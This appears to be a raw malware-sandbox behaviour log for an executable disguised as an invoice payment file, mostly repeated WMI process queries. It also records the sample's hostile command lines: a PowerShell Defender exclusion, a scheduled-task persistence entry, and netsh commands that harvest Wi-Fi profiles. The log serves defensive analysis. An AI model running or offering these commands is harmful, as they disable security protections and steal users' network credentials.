Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp3F74.tmp.dat.11.dr, tmp146D.tmp.dat.6.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Invoice-BL. Payment TT $ 28,945.99.exe	ReversingLabs: Detection: 73%
Source: Invoice-BL. Payment TT $ 28,945.99.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File read: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
